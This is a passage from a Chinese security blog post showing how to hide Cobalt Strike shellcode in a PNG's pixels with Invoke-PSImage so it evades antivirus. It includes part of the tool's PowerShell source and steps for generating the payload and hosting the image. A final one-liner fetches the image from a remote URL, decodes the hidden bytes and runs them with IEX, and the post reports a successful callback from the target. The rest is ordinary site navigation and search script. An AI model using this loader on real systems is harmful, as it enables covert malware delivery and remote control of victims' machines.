&#123;</span><br><span class="line">            <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.PictureBox).Load(`"<span class="variable">$testurl</span>`");`$g=`$d.Image;`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%&#123;foreach(`$x in(0..<span class="variable">$lwidth</span>))&#123;`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))&#125;&#125;;IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"<span class="variable">$Out</span>`");`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%&#123;foreach(`$x in(0..<span class="variable">$lwidth</span>))&#123;`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G-band15))&#125;&#125;;`$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$pscmd</span></span><br><span class="line"></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment"># Decide how large our image needs to be (always square for easy math)</span></span><br><span class="line">        <span class="variable">$side</span> = ([<span class="built_in">int</span>] ([<span class="type">math</span>]::ceiling([<span class="type">math</span>]::Sqrt([<span class="type">math</span>]::ceiling(<span class="variable">$payload</span>.Length / <span class="number">3</span>)) + <span class="number">3</span>) / <span class="number">4</span>)) * <span class="number">4</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># Decide how large our image needs to be (always square for easy math)</span></span><br><span class="line">        <span class="variable">$rgbValues</span> = <span class="built_in">New-Object</span> byte[] (<span class="variable">$side</span> * <span class="variable">$side</span> * <span class="number">3</span>);</span><br><span class="line">        <span class="variable">$randstr</span> = [<span class="type">System.Web.Security.Membership</span>]::GeneratePassword(<span class="number">128</span>,<span class="number">0</span>)</span><br><span class="line">        <span class="variable">$randb</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$randstr</span>)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># loop through the RGB array and copy the payload into it</span></span><br><span class="line">        <span class="keyword">for</span> (<span class="variable">$counter</span> = <span class="number">0</span>; <span class="variable">$counter</span> <span class="operator">-lt</span> (<span class="variable">$rgbValues</span>.Length); <span class="variable">$counter</span>++) &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$counter</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length)&#123;</span><br><span class="line">                <span class="variable">$rgbValues</span>[<span class="variable">$counter</span>] = <span class="variable">$payload</span>[<span class="variable">$counter</span>]</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$rgbValues</span>[<span class="variable">$counter</span>] = <span class="variable">$randb</span>[<span class="variable">$counter</span>%<span class="number">113</span>]</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Copy the array of RGB values back to the bitmap</span></span><br><span class="line">        <span class="variable">$ptr</span> = [<span class="type">System.Runtime.InteropServices.Marshal</span>]::AllocHGlobal(<span class="variable">$rgbValues</span>.Length)</span><br><span class="line">        [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$ptr</span>, <span class="variable">$rgbValues</span>.Length)</span><br><span class="line">        <span class="variable">$img</span> = <span class="built_in">New-Object</span> System.Drawing.Bitmap(<span class="variable">$side</span>, <span class="variable">$side</span>, (<span class="variable">$side</span>*<span class="number">3</span>), [<span class="type">System.Drawing.Imaging.PixelFormat</span>]::Format24bppRgb, <span class="variable">$ptr</span>)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Write the image to a file</span></span><br><span class="line">        <span class="variable">$img</span>.Save(<span class="variable">$Out</span>, [<span class="type">System.Drawing.Imaging.ImageFormat</span>]::Png)</span><br><span class="line">        <span class="variable">$img</span>.Dispose()</span><br><span class="line">        [<span class="type">System.Runtime.InteropServices.Marshal</span>]::FreeHGlobal(<span class="variable">$ptr</span>);</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># Get a bunch of numbers we need to use in the oneliner</span></span><br><span class="line">        <span class="variable">$array</span> = (<span class="variable">$side</span>*<span class="variable">$side</span>)*<span class="number">3</span></span><br><span class="line">        <span class="variable">$lrows</span> = (<span class="variable">$side</span><span class="literal">-1</span>)</span><br><span class="line">        <span class="variable">$lwidth</span> = (<span class="variable">$side</span><span class="literal">-1</span>)</span><br><span class="line">        <span class="variable">$width</span> = (<span class="variable">$side</span>)</span><br><span class="line">        <span class="variable">$lpayload</span> = (<span class="variable">$payload</span>.Length<span class="literal">-1</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$WebClient</span>) &#123;</span><br><span class="line">            <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(`"<span class="variable">$testurl</span>`"));`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%&#123;foreach(`$x in(0..<span class="variable">$lwidth</span>))&#123;`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R&#125;&#125;;IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line">        &#125; <span class="keyword">elseif</span>(<span class="variable">$PictureBox</span>) &#123;</span><br><span class="line">            <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.PictureBox).Load(`"<span class="variable">$testurl</span>`");`$g=`$d.Image;`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%&#123;foreach(`$x in(0..<span class="variable">$lwidth</span>))&#123;`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R&#125;&#125;;IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"<span class="variable">$Out</span>`");`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%&#123;foreach(`$x in(0..<span class="variable">$lwidth</span>))&#123;`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R&#125;&#125;;`$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$pscmd</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="CS生成Shellcode"><a href="#CS生成Shellcode" class="headerlink" title="CS生成Shellcode"></a>CS生成Shellcode</h5><p>Attacks &gt;&gt;  Packages &gt;&gt; Payload Generator  生成Shellcode </p>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210416092120420.png" alt="image-20210416092120420"></p>
<h5 id="生成Shellcode图片"><a href="#生成Shellcode图片" class="headerlink" title="生成Shellcode图片"></a>生成Shellcode图片</h5><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1、设置策略不受限制，范围为当前用户；可get-ExecutionPolicy-List查看当前策略</span></span><br><span class="line"><span class="built_in">Set-ExecutionPolicy</span> Unrestricted <span class="literal">-Scope</span> CurrentUser</span><br><span class="line"><span class="comment"># 2、导入下载的Invoke-PSimage.ps1模块</span></span><br><span class="line"><span class="built_in">Import-Module</span> .\<span class="built_in">Invoke-PSimage</span>.ps1</span><br><span class="line"><span class="comment"># 3、生成 shellcode 的图片</span></span><br><span class="line"><span class="built_in">Invoke-PSImage</span> <span class="literal">-Script</span> .\payload.ps1 <span class="literal">-Image</span> .\<span class="number">2021</span>.jpg <span class="literal">-Out</span> .\<span class="number">2021</span>.png <span class="literal">-Web</span></span><br><span class="line"><span class="comment"># 参数介绍</span></span><br><span class="line"><span class="literal">-Script</span> [<span class="type">filepath</span>]嵌入到图像中的脚本的路径。</span><br><span class="line"><span class="literal">-Out</span> [<span class="type">filepath</span>]将结果图像保存到的文件（图像将为PNG）</span><br><span class="line"><span class="literal">-Image</span> [<span class="type">filepath</span>]要嵌入脚本的图像。</span><br><span class="line"><span class="literal">-Web</span> 输出用于使用Net.WebClient从Web读取图像的命令。</span><br></pre></td></tr></table></figure>

<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202230131.png" alt="image-20210415202230131"></p>
<h5 id="HTTP服务"><a href="#HTTP服务" class="headerlink" title="HTTP服务"></a>HTTP服务</h5><p>将生成的图片放在HTTP服务，这里用python3起了个HTTP服务</p>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202655248.png" alt="image-20210415202655248"></p>
<h5 id="效果"><a href="#效果" class="headerlink" title="效果"></a>效果</h5><p>靶机机powershell运行命令，成功上线。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># http://example.com/2021.png 替换你图片地址</span></span><br><span class="line"></span><br><span class="line">sal a <span class="built_in">New-Object</span>;<span class="built_in">Add-Type</span> <span class="literal">-A</span> System.Drawing;<span class="variable">$g</span>=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(<span class="string">"http://example.com/2021.png"</span>));<span class="variable">$o</span>=a Byte[] <span class="number">3696</span>;(<span class="number">0</span>..<span class="number">20</span>)|%&#123;<span class="keyword">foreach</span>(<span class="variable">$x</span> <span class="keyword">in</span>(<span class="number">0</span>..<span class="number">175</span>))&#123;<span class="variable">$p</span>=<span class="variable">$g</span>.GetPixel(<span class="variable">$x</span>,<span class="variable">$_</span>);<span class="variable">$o</span>[<span class="variable">$_</span>*<span class="number">176</span>+<span class="variable">$x</span>]=([<span class="type">math</span>]::Floor((<span class="variable">$p</span>.B<span class="literal">-band15</span>)*<span class="number">16</span>)<span class="operator">-bor</span>(<span class="variable">$p</span>.G <span class="operator">-band</span> <span class="number">15</span>))&#125;&#125;;IEX([<span class="type">System.Text.Encoding</span>]::ASCII.GetString(<span class="variable">$o</span>[<span class="number">0</span><span class="type">..3598</span>]))</span><br></pre></td></tr></table></figure>

<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415201441673.png" alt="image-20210415201441673"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://github.com/dayuxiyou/Invoke-PSImage" target="_blank" rel="noopener">https://github.com/dayuxiyou/Invoke-PSImage</a></p>
<p><a href="https://www.freebuf.com/articles/web/262978.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/262978.html</a></p>

      
    </div>
    
    
    
		<div>
		  
			<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-本文结束<i class="fa fa-paw"></i>感谢您的阅读-</div>
    
</div>
		  
		</div>
    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/04/14/chrome-0day0414/" rel="next" title="chrome 0day 远程代码执行">
                <i class="fa fa-chevron-left"></i> chrome 0day 远程代码执行
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/04/18/Wechat-RCE-0day/" rel="prev" title="Wechat RCE 0day">
                Wechat RCE 0day <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        
  <script>
    window._bd_share_config = {
      "common": {
        "bdText": "",
        "bdMini": "1",
        "bdMiniList": false,
        "bdPic": ""
      },
      "image": {
        "viewList": ["tsina", "douban", "sqq", "qzone", "weixin", "twi", "fbook"],
        "viewText": "分享到：",
        "viewSize": "16"
      },
      "slide": {
        "bdImg": "5",
        "bdPos": "left",
        "bdTop": "100"
      }
    }
  </script>

<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?'];
</script>

      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/uploads/avatar.jpg"
                alt="小维同学" />
            
              <p class="site-author-name" itemprop="name">小维同学</p>
              <p class="site-description motion-element" itemprop="description">努力努力再努力</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">44</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
		  <!-- 网易音乐播放器 -->
			<div id="music163player">
				
			</div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.lstazl.com/" title="小窝" target="_blank">小窝</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#写在前面"><span class="nav-text">写在前面</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#环境介绍"><span class="nav-text">环境介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#隐写RGB示例"><span class="nav-text">隐写RGB示例</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Invoke-PSImage下载"><span class="nav-text">Invoke-PSImage下载</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#CS生成Shellcode"><span class="nav-text">CS生成Shellcode</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#生成Shellcode图片"><span class="nav-text">生成Shellcode图片</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#HTTP服务"><span class="nav-text">HTTP服务</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#效果"><span class="nav-text">效果</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考"><span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">小维同学</span>

  
</div>






  <div class="theme-info">❤  <a class="theme-link" target="_blank" href="https://scriptkid-beta.github.io/">LZL</a></div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300,"hOffset":-15,"vOffset":-15},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
